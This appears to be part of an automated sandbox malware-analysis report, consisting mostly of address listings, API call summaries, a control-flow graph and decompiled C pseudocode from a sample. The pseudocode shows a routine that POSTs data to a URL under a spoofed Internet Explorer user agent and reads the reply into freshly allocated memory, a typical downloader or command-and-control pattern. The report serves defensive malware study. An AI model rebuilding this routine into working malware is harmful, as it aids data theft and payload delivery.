                                                                                                                                                                                                                                                                          0x04006807
                                                                                                                                                                                                                                                                          0x04006819
                                                                                                                                                                                                                                                                          0x0400681f
                                                                                                                                                                                                                                                                          0x0400683a
                                                                                                                                                                                                                                                                          0x0400683f
                                                                                                                                                                                                                                                                          0x0400683f
                                                                                                                                                                                                                                                                          0x04006807
                                                                                                                                                                                                                                                                          0x04006850
                                                                                                                                                                                                                                                                          0x04006850
                                                                                                                                                                                                                                                                          0x04006856
                                                                                                                                                                                                                                                                          0x0400686a
                                                                                                                                                                                                                                                                          0x04006871
                                                                                                                                                                                                                                                                          0x04006877
                                                                                                                                                                                                                                                                          0x0400687a
                                                                                                                                                                                                                                                                          0x0400687e
                                                                                                                                                                                                                                                                          0x0400688c
                                                                                                                                                                                                                                                                          0x04006891
                                                                                                                                                                                                                                                                          0x04006891
                                                                                                                                                                                                                                                                          0x04006894
                                                                                                                                                                                                                                                                          0x0400689a
                                                                                                                                                                                                                                                                          0x0400689d
                                                                                                                                                                                                                                                                          0x040068a5
                                                                                                                                                                                                                                                                          0x040068aa
                                                                                                                                                                                                                                                                          0x040068ad
                                                                                                                                                                                                                                                                          0x040068b9
                                                                                                                                                                                                                                                                          0x040068bf
                                                                                                                                                                                                                                                                          0x040068c5
                                                                                                                                                                                                                                                                          0x040068c8
                                                                                                                                                                                                                                                                          0x04006902
                                                                                                                                                                                                                                                                          0x0400690a
                                                                                                                                                                                                                                                                          0x0400690d
                                                                                                                                                                                                                                                                          0x04006920
                                                                                                                                                                                                                                                                          0x04006925
                                                                                                                                                                                                                                                                          0x04006931
                                                                                                                                                                                                                                                                          0x04006931
                                                                                                                                                                                                                                                                          0x040068ca
                                                                                                                                                                                                                                                                          0x040068d6
                                                                                                                                                                                                                                                                          0x040068e4
                                                                                                                                                                                                                                                                          0x040068e4
                                                                                                                                                                                                                                                                          0x0400693a
                                                                                                                                                                                                                                                                          0x0400693d
                                                                                                                                                                                                                                                                          0x0400694b
                                                                                                                                                                                                                                                                          0x0400695a
                                                                                                                                                                                                                                                                          0x04006971
                                                                                                                                                                                                                                                                          0x04006977
                                                                                                                                                                                                                                                                          0x04006984
                                                                                                                                                                                                                                                                          0x04006984
                                                                                                                                                                                                                                                                          0x0400693d
                                                                                                                                                                                                                                                                          0x0400698a
                                                                                                                                                                                                                                                                          0x04006990
                                                                                                                                                                                                                                                                          0x04006993
                                                                                                                                                                                                                                                                          0x040069a1
                                                                                                                                                                                                                                                                          0x040069a6
                                                                                                                                                                                                                                                                          0x040069a6
                                                                                                                                                                                                                                                                          0x040069a9
                                                                                                                                                                                                                                                                          0x040069a9
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040069b0
                                                                                                                                                                                                                                                                          0x04006667
                                                                                                                                                                                                                                                                          0x0400666d
                                                                                                                                                                                                                                                                          0x04006674
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04006689
                                                                                                                                                                                                                                                                          0x04006693
                                                                                                                                                                                                                                                                          0x04006698
                                                                                                                                                                                                                                                                          0x0400669b
                                                                                                                                                                                                                                                                          0x040066a7
                                                                                                                                                                                                                                                                          0x040066b8
                                                                                                                                                                                                                                                                          0x040066c6
                                                                                                                                                                                                                                                                          0x040066d5
                                                                                                                                                                                                                                                                          0x040066e4
                                                                                                                                                                                                                                                                          0x040066f0
                                                                                                                                                                                                                                                                          0x040066ff
                                                                                                                                                                                                                                                                          0x0400670e
                                                                                                                                                                                                                                                                          0x0400671d
                                                                                                                                                                                                                                                                          0x0400673a
                                                                                                                                                                                                                                                                          0x04006747
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04006747
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04006642
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040065fe
                                                                                                                                                                                                                                                                          0x040064ae
                                                                                                                                                                                                                                                                          0x040064b4
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040064cb
                                                                                                                                                                                                                                                                          0x040064dc
                                                                                                                                                                                                                                                                          0x040064ed
                                                                                                                                                                                                                                                                          0x040064f2
                                                                                                                                                                                                                                                                          0x0400651a
                                                                                                                                                                                                                                                                          0x0400653f
                                                                                                                                                                                                                                                                          0x04006545
                                                                                                                                                                                                                                                                          0x0400654c
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04006552
                                                                                                                                                                                                                                                                          0x0400655c
                                                                                                                                                                                                                                                                          0x0400657e
                                                                                                                                                                                                                                                                          0x04006584
                                                                                                                                                                                                                                                                          0x04006586
                                                                                                                                                                                                                                                                          0x040065dd
                                                                                                                                                                                                                                                                          0x040065dd
                                                                                                                                                                                                                                                                          0x040065e4
                                                                                                                                                                                                                                                                          0x040065ed
                                                                                                                                                                                                                                                                          0x040065ed
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040065e4
                                                                                                                                                                                                                                                                          0x0400658e
                                                                                                                                                                                                                                                                          0x04006591
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040065a0
                                                                                                                                                                                                                                                                          0x040065a6
                                                                                                                                                                                                                                                                          0x040065b2
                                                                                                                                                                                                                                                                          0x040065b7
                                                                                                                                                                                                                                                                          0x040065ba
                                                                                                                                                                                                                                                                          0x040065c0
                                                                                                                                                                                                                                                                          0x040065c7
                                                                                                                                                                                                                                                                          0x040065d8
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040065d8
                                                                                                                                                                                                                                                                          0x040065c9
                                                                                                                                                                                                                                                                          0x040065d0
                                                                                                                                                                                                                                                                          0x040065d0
                                                                                                                                                                                                                                                                          0x04006464
                                                                                                                                                                                                                                                                          0x0400646d
                                                                                                                                                                                                                                                                          0x04006476
                                                                                                                                                                                                                                                                          0x04006479
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0400647b
                                                                                                                                                                                                                                                                          0x04006c33
                                                                                                                                                                                                                                                                          0x04006c36
                                                                                                                                                                                                                                                                          0x04006c44
                                                                                                                                                                                                                                                                          0x04006c38
                                                                                                                                                                                                                                                                          0x04006c38
                                                                                                                                                                                                                                                                          0x04006c38
                                                                                                                                                                                                                                                                          0x04006c36
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040062e0

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 040063BD
                                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,00000000,?), ref: 04006408
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.603215187.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603118352.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603533696.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603602052.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Virtual$AllocFree
                                                                                                                                                                                                                                                                          • String ID: Kobucgekyxca$TEMP$TEMP
                                                                                                                                                                                                                                                                          • API String ID: 2087232378-2361037019
                                                                                                                                                                                                                                                                          • Opcode ID: 36a74629caef2e12234a485460b867fdbdc2bfda1a936d4e7568c691b9f69a1a
                                                                                                                                                                                                                                                                          • Instruction ID: 78f313c43f0008814aaec3ee7e7f4a65c37c9c75159239be5687e4ed3a221f5b
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 36a74629caef2e12234a485460b867fdbdc2bfda1a936d4e7568c691b9f69a1a
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 70522BB5A042199FEB54DF94DC88FAEB7B6FB48304F148598E509BB280D775AE80CF50
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 450 4001840-4001854 451 4001c95-4001c9b 450->451 452 400185a-400185e 450->452 452->451 453 4001864-4001868 452->453 453->451 454 400186e-4001872 453->454 454->451 455 4001878-400190a call 4007d20 InternetCrackUrlA 454->455 455->451 458 4001910-4001930 InternetOpenA 455->458 458->451 459 4001936-4001969 InternetConnectA 458->459 460 4001c88-4001c8f InternetCloseHandle 459->460 461 400196f-40019a7 HttpOpenRequestA 459->461 460->451 462 4001c7b-4001c82 InternetCloseHandle 461->462 463 40019ad-40019e5 wnsprintfA HttpAddRequestHeadersA 461->463 462->460 464 40019eb-40019f9 463->464 465 4001c6e-4001c75 InternetCloseHandle 463->465 466 4001a04-4001a26 InternetSetOptionA 464->466 467 40019fb-40019fe 464->467 465->462 468 4001a30-4001a75 call 4007d20 HttpSendRequestA 466->468 467->466 471 4001a7b-4001aa1 HttpQueryInfoA 468->471 472 4001c4c-4001c5f 468->472 474 4001aa3-4001abc call 4007dd0 471->474 475 4001ac9-4001b0f call 4007d20 HttpQueryInfoA 471->475 472->465 473 4001c61-4001c68 472->473 473->465 473->468 474->475 482 4001abe-4001ac7 474->482 480 4001b11-4001b2d call 4007dd0 475->480 481 4001b47-4001b6a VirtualAlloc 475->481 480->481 489 4001b2f-4001b39 480->489 484 4001b70-4001b93 481->484 485 4001c19 481->485 482->475 488 4001b99-4001bc9 InternetReadFile 484->488 486 4001c23-4001c4a InternetReadFile 485->486 486->472 486->486 490 4001bdb-4001be2 488->490 491 4001bcb-4001bd9 488->491 489->481 492 4001b3b-4001b41 489->492 493 4001be4 490->493 494 4001be6-4001c11 490->494 491->490 492->481 495 4001c17 493->495 496 4001c13 494->496 497 4001c15 494->497 495->472 496->495 497->488
                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                          			E04001840(char* _a4, void* _a8, long _a12, intOrPtr* _a16, intOrPtr* _a20, intOrPtr* _a24, intOrPtr _a28, intOrPtr* _a32) {
                                                                                                                                                                                                                                                                          				long _v8;
                                                                                                                                                                                                                                                                          				char _v276;
                                                                                                                                                                                                                                                                          				char _v1300;
                                                                                                                                                                                                                                                                          				char _v1564;
                                                                                                                                                                                                                                                                          				void* _v1568;
                                                                                                                                                                                                                                                                          				void* _v1572;
                                                                                                                                                                                                                                                                          				char* _v1576;
                                                                                                                                                                                                                                                                          				intOrPtr _v1588;
                                                                                                                                                                                                                                                                          				char* _v1592;
                                                                                                                                                                                                                                                                          				signed short _v1612;
                                                                                                                                                                                                                                                                          				intOrPtr _v1616;
                                                                                                                                                                                                                                                                          				char* _v1620;
                                                                                                                                                                                                                                                                          				void* _v1636;
                                                                                                                                                                                                                                                                          				void* _v1640;
                                                                                                                                                                                                                                                                          				void* _v1644;
                                                                                                                                                                                                                                                                          				void* _v1648;
                                                                                                                                                                                                                                                                          				long _v1652;
                                                                                                                                                                                                                                                                          				void _v1656;
                                                                                                                                                                                                                                                                          				void _v1916;
                                                                                                                                                                                                                                                                          				long _v1920;
                                                                                                                                                                                                                                                                          				long _v1924;
                                                                                                                                                                                                                                                                          				long _v1928;
                                                                                                                                                                                                                                                                          				void* _v1932;
                                                                                                                                                                                                                                                                          				intOrPtr _v1936;
                                                                                                                                                                                                                                                                          				long _v1940;
                                                                                                                                                                                                                                                                          				long _v1944;
                                                                                                                                                                                                                                                                          				long _v1948;
                                                                                                                                                                                                                                                                          				void _v2972;
                                                                                                                                                                                                                                                                          				long _v2976;
                                                                                                                                                                                                                                                                          				int _t116;
                                                                                                                                                                                                                                                                          				void* _t117;
                                                                                                                                                                                                                                                                          				void* _t119;
                                                                                                                                                                                                                                                                          				void* _t123;
                                                                                                                                                                                                                                                                          				int _t133;
                                                                                                                                                                                                                                                                          				void* _t143;
                                                                                                                                                                                                                                                                          				long _t151;
                                                                                                                                                                                                                                                                          				void* _t194;
                                                                                                                                                                                                                                                                          				void* _t195;
                                                                                                                                                                                                                                                                          				void* _t196;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                          				if(_a4 == 0 || _a8 == 0 || _a12 == 0 || _a16 == 0) {
                                                                                                                                                                                                                                                                          					L37:
                                                                                                                                                                                                                                                                          					return _v8;
                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                          					_v1644 = 0;
                                                                                                                                                                                                                                                                          					_v1640 = 0;
                                                                                                                                                                                                                                                                          					_v1568 = 0;
                                                                                                                                                                                                                                                                          					_v1576 = "*/*";
                                                                                                                                                                                                                                                                          					_v1572 = 0;
                                                                                                                                                                                                                                                                          					E04007D20( &_v1636,  &_v1636, 0, 0x3c);
                                                                                                                                                                                                                                                                          					_t195 = _t194 + 0xc;
                                                                                                                                                                                                                                                                          					_v1636 = 0x3c;
                                                                                                                                                                                                                                                                          					_v1620 =  &_v1564;
                                                                                                                                                                                                                                                                          					_v1616 = 0x104;
                                                                                                                                                                                                                                                                          					_v1592 =  &_v276;
                                                                                                                                                                                                                                                                          					_v1588 = 0x104;
                                                                                                                                                                                                                                                                          					_t116 = InternetCrackUrlA(_a4, 0, 0,  &_v1636); // executed
                                                                                                                                                                                                                                                                          					if(_t116 == 0) {
                                                                                                                                                                                                                                                                          						goto L37;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					_t117 = InternetOpenA("Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)", 1, 0, 0, 0); // executed
                                                                                                                                                                                                                                                                          					_v1644 = _t117;
                                                                                                                                                                                                                                                                          					if(_v1644 == 0) {
                                                                                                                                                                                                                                                                          						goto L37;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					_t119 = InternetConnectA(_v1644, _v1620, _v1612 & 0x0000ffff, 0, 0, 3, 0, 0); // executed
                                                                                                                                                                                                                                                                          					_v1640 = _t119;
                                                                                                                                                                                                                                                                          					if(_v1640 == 0) {
                                                                                                                                                                                                                                                                          						L36:
                                                                                                                                                                                                                                                                          						InternetCloseHandle(_v1644);
                                                                                                                                                                                                                                                                          						goto L37;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					_t123 = HttpOpenRequestA(_v1640, "POST", _v1592, 0, 0,  &_v1576, 0x200300, 0); // executed
                                                                                                                                                                                                                                                                          					_v1568 = _t123;
                                                                                                                                                                                                                                                                          					if(_v1568 == 0) {
                                                                                                                                                                                                                                                                          						L35:
                                                                                                                                                                                                                                                                          						InternetCloseHandle(_v1640);
                                                                                                                                                                                                                                                                          						goto L36;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					wnsprintfA( &_v1300, 0x400, "Accept-Language: en-us\r\nContent-Type: application/octet-stream\r\nContent-Length: %d\r\n", _a12);
                                                                                                                                                                                                                                                                          					_t196 = _t195 + 0x10;
                                                                                                                                                                                                                                                                          					if(HttpAddRequestHeadersA(_v1568,  &_v1300, 0xffffffff, 0) == 0) {
                                                                                                                                                                                                                                                                          						L34:
                                                                                                                                                                                                                                                                          						InternetCloseHandle(_v1568); // executed
                                                                                                                                                                                                                                                                          						goto L35;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					_v1656 = 0x7530;
                                                                                                                                                                                                                                                                          					if(_a28 > 0) {
                                                                                                                                                                                                                                                                          						_v1656 = _a28;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					InternetSetOptionA(_v1568, 6,  &_v1656, 4);
                                                                                                                                                                                                                                                                          					_v1652 = 1;
                                                                                                                                                                                                                                                                          					_v1648 = 0;
                                                                                                                                                                                                                                                                          					do {
                                                                                                                                                                                                                                                                          						_v1920 = 0x100;
                                                                                                                                                                                                                                                                          						E04007D20( &_v1916,  &_v1916, 0, 0x100);
                                                                                                                                                                                                                                                                          						_t196 = _t196 + 0xc;
                                                                                                                                                                                                                                                                          						_v1924 = 0;
                                                                                                                                                                                                                                                                          						_t133 = HttpSendRequestA(_v1568, 0, 0, _a8, _a12); // executed
                                                                                                                                                                                                                                                                          						if(_t133 == 0) {
                                                                                                                                                                                                                                                                          							goto L32;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						if(HttpQueryInfoA(_v1568, 0x13,  &_v1916,  &_v1920,  &_v1924) != 0) {
                                                                                                                                                                                                                                                                          							_t137 = E04007DD0( &_v1916);
                                                                                                                                                                                                                                                                          							_t196 = _t196 + 4;
                                                                                                                                                                                                                                                                          							_v1936 = _t137;
                                                                                                                                                                                                                                                                          							if(_a32 != 0) {
                                                                                                                                                                                                                                                                          								_t137 = _a32;
                                                                                                                                                                                                                                                                          								 *_a32 = _v1936;
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						E04007D20(_t137,  &_v1916, 0, 0x100);
                                                                                                                                                                                                                                                                          						_t196 = _t196 + 0xc;
                                                                                                                                                                                                                                                                          						_v1928 = 0x500000;
                                                                                                                                                                                                                                                                          						if(HttpQueryInfoA(_v1568, 5,  &_v1916,  &_v1920,  &_v1924) != 0) {
                                                                                                                                                                                                                                                                          							_t151 = E04007DD0( &_v1916);
                                                                                                                                                                                                                                                                          							_t196 = _t196 + 4;
                                                                                                                                                                                                                                                                          							_v1940 = _t151;
                                                                                                                                                                                                                                                                          							if(_v1940 > 0 && _v1940 < 0x40000000) {
                                                                                                                                                                                                                                                                          								_v1928 = _v1940;
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						_t143 = VirtualAlloc(0, _v1928, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                          						_v1932 = _t143;
                                                                                                                                                                                                                                                                          						if(_v1932 == 0) {
                                                                                                                                                                                                                                                                          							_v2976 = 0;
                                                                                                                                                                                                                                                                          							do {
                                                                                                                                                                                                                                                                          								InternetReadFile(_v1568,  &_v2972, 0x400,  &_v2976);
                                                                                                                                                                                                                                                                          							} while (_v2976 > 0);
                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                          							 *_a16 = _v1932;
                                                                                                                                                                                                                                                                          							 *_a20 = _v1928;
                                                                                                                                                                                                                                                                          							_v8 = 1;
                                                                                                                                                                                                                                                                          							_v1944 = _v1928;
                                                                                                                                                                                                                                                                          							while(1) {
                                                                                                                                                                                                                                                                          								_v1948 = 0;
                                                                                                                                                                                                                                                                          								InternetReadFile(_v1568, _v1932, _v1944,  &_v1948); // executed
                                                                                                                                                                                                                                                                          								if(_a24 != 0) {
                                                                                                                                                                                                                                                                          									 *_a24 =  *_a24 + _v1948;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								if(_v1948 == 0) {
                                                                                                                                                                                                                                                                          									break;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								_v1932 = _v1932 + _v1948;
                                                                                                                                                                                                                                                                          								_v1944 = _v1944 - _v1948;
                                                                                                                                                                                                                                                                          								if(_v1944 > 0) {
                                                                                                                                                                                                                                                                          									continue;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								L29:
                                                                                                                                                                                                                                                                          								goto L32;
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							goto L29;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						L32:
                                                                                                                                                                                                                                                                          						_v1648 = _v1648 + 1;
                                                                                                                                                                                                                                                                          					} while (_v8 == 0 && _v1648 < 1);
                                                                                                                                                                                                                                                                          					goto L34;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          			}










































                                                                                                                                                                                                                                                                          0x04001849
                                                                                                                                                                                                                                                                          0x04001854
                                                                                                                                                                                                                                                                          0x04001c95
                                                                                                                                                                                                                                                                          0x04001c9b
                                                                                                                                                                                                                                                                          0x04001878
                                                                                                                                                                                                                                                                          0x04001878
                                                                                                                                                                                                                                                                          0x04001882
                                                                                                                                                                                                                                                                          0x0400188c
                                                                                                                                                                                                                                                                          0x04001896
                                                                                                                                                                                                                                                                          0x040018a0
                                                                                                                                                                                                                                                                          0x040018b5
                                                                                                                                                                                                                                                                          0x040018ba
                                                                                                                                                                                                                                                                          0x040018bd
                                                                                                                                                                                                                                                                          0x040018cd
                                                                                                                                                                                                                                                                          0x040018d3
                                                                                                                                                                                                                                                                          0x040018e3
                                                                                                                                                                                                                                                                          0x040018e9
                                                                                                                                                                                                                                                                          0x04001902
                                                                                                                                                                                                                                                                          0x0400190a
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0400191d
                                                                                                                                                                                                                                                                          0x04001923
                                                                                                                                                                                                                                                                          0x04001930
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04001956
                                                                                                                                                                                                                                                                          0x0400195c
                                                                                                                                                                                                                                                                          0x04001969
                                                                                                                                                                                                                                                                          0x04001c88
                                                                                                                                                                                                                                                                          0x04001c8f
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04001c8f
                                                                                                                                                                                                                                                                          0x04001994
                                                                                                                                                                                                                                                                          0x0400199a
                                                                                                                                                                                                                                                                          0x040019a7
                                                                                                                                                                                                                                                                          0x04001c7b
                                                                                                                                                                                                                                                                          0x04001c82
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04001c82
                                                                                                                                                                                                                                                                          0x040019c2
                                                                                                                                                                                                                                                                          0x040019c8
                                                                                                                                                                                                                                                                          0x040019e5
                                                                                                                                                                                                                                                                          0x04001c6e
                                                                                                                                                                                                                                                                          0x04001c75
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04001c75
                                                                                                                                                                                                                                                                          0x040019eb
                                                                                                                                                                                                                                                                          0x040019f9
                                                                                                                                                                                                                                                                          0x040019fe
                                                                                                                                                                                                                                                                          0x040019fe
                                                                                                                                                                                                                                                                          0x04001a16
                                                                                                                                                                                                                                                                          0x04001a1c
                                                                                                                                                                                                                                                                          0x04001a26
                                                                                                                                                                                                                                                                          0x04001a30
                                                                                                                                                                                                                                                                          0x04001a30
                                                                                                                                                                                                                                                                          0x04001a48
                                                                                                                                                                                                                                                                          0x04001a4d
                                                                                                                                                                                                                                                                          0x04001a50
                                                                                                                                                                                                                                                                          0x04001a6d
                                                                                                                                                                                                                                                                          0x04001a75
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04001aa1
                                                                                                                                                                                                                                                                          0x04001aaa
                                                                                                                                                                                                                                                                          0x04001aaf
                                                                                                                                                                                                                                                                          0x04001ab2
                                                                                                                                                                                                                                                                          0x04001abc
                                                                                                                                                                                                                                                                          0x04001abe
                                                                                                                                                                                                                                                                          0x04001ac7
                                                                                                                                                                                                                                                                          0x04001ac7
                                                                                                                                                                                                                                                                          0x04001abc
                                                                                                                                                                                                                                                                          0x04001ad7
                                                                                                                                                                                                                                                                          0x04001adc
                                                                                                                                                                                                                                                                          0x04001adf
                                                                                                                                                                                                                                                                          0x04001b0f
                                                                                                                                                                                                                                                                          0x04001b18
                                                                                                                                                                                                                                                                          0x04001b1d
                                                                                                                                                                                                                                                                          0x04001b20
                                                                                                                                                                                                                                                                          0x04001b2d
                                                                                                                                                                                                                                                                          0x04001b41
                                                                                                                                                                                                                                                                          0x04001b41
                                                                                                                                                                                                                                                                          0x04001b2d
                                                                                                                                                                                                                                                                          0x04001b57
                                                                                                                                                                                                                                                                          0x04001b5d
                                                                                                                                                                                                                                                                          0x04001b6a
                                                                                                                                                                                                                                                                          0x04001c19
                                                                                                                                                                                                                                                                          0x04001c23
                                                                                                                                                                                                                                                                          0x04001c3d
                                                                                                                                                                                                                                                                          0x04001c43
                                                                                                                                                                                                                                                                          0x04001b70
                                                                                                                                                                                                                                                                          0x04001b79
                                                                                                                                                                                                                                                                          0x04001b84
                                                                                                                                                                                                                                                                          0x04001b86
                                                                                                                                                                                                                                                                          0x04001b93
                                                                                                                                                                                                                                                                          0x04001b99
                                                                                                                                                                                                                                                                          0x04001b99
                                                                                                                                                                                                                                                                          0x04001bbf
                                                                                                                                                                                                                                                                          0x04001bc9
                                                                                                                                                                                                                                                                          0x04001bd9
                                                                                                                                                                                                                                                                          0x04001bd9
                                                                                                                                                                                                                                                                          0x04001be2
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04001bf2
                                                                                                                                                                                                                                                                          0x04001c04
                                                                                                                                                                                                                                                                          0x04001c11
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04001c15
                                                                                                                                                                                                                                                                          0x04001c17
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04001c17
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04001be4
                                                                                                                                                                                                                                                                          0x04001c4c
                                                                                                                                                                                                                                                                          0x04001c55
                                                                                                                                                                                                                                                                          0x04001c5b
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04001a30

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • InternetCrackUrlA.WININET(00000000,00000000,00000000,0000003C), ref: 04001902
                                                                                                                                                                                                                                                                          • InternetOpenA.WININET(Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1),00000001,00000000,00000000,00000000), ref: 0400191D
                                                                                                                                                                                                                                                                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 04001956
                                                                                                                                                                                                                                                                          • HttpOpenRequestA.WININET(00000000,POST,?,00000000,00000000,0400C2C8,00200300,00000000), ref: 04001994
                                                                                                                                                                                                                                                                          • wnsprintfA.SHLWAPI ref: 040019C2
                                                                                                                                                                                                                                                                          • HttpAddRequestHeadersA.WININET(00000000,?,000000FF,00000000), ref: 040019DD
                                                                                                                                                                                                                                                                          • InternetSetOptionA.WININET(00000000,00000006,00007530,00000004), ref: 04001A16
                                                                                                                                                                                                                                                                          • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 04001A6D
                                                                                                                                                                                                                                                                          • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 04001A99
                                                                                                                                                                                                                                                                          • HttpQueryInfoA.WININET(00000000,00000005,?,00000100,00000000), ref: 04001B07
                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00500000,00003000,00000004), ref: 04001B57
                                                                                                                                                                                                                                                                          • InternetReadFile.WININET(00000000,00000000,?,00000000), ref: 04001BBF
                                                                                                                                                                                                                                                                          • InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 04001C3D
                                                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 04001C75
                                                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 04001C82
                                                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 04001C8F
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          • 0u, xrefs: 040019EB
                                                                                                                                                                                                                                                                          • POST, xrefs: 04001988
                                                                                                                                                                                                                                                                          • Accept-Language: en-usContent-Type: application/octet-streamContent-Length: %d, xrefs: 040019B1
                                                                                                                                                                                                                                                                          • <, xrefs: 040018BD
                                                                                                                                                                                                                                                                          • Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1), xrefs: 04001918
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.603215187.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603118352.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603533696.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603602052.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Internet$Http$CloseHandleRequest$FileInfoOpenQueryRead$AllocConnectCrackHeadersOptionSendVirtualwnsprintf
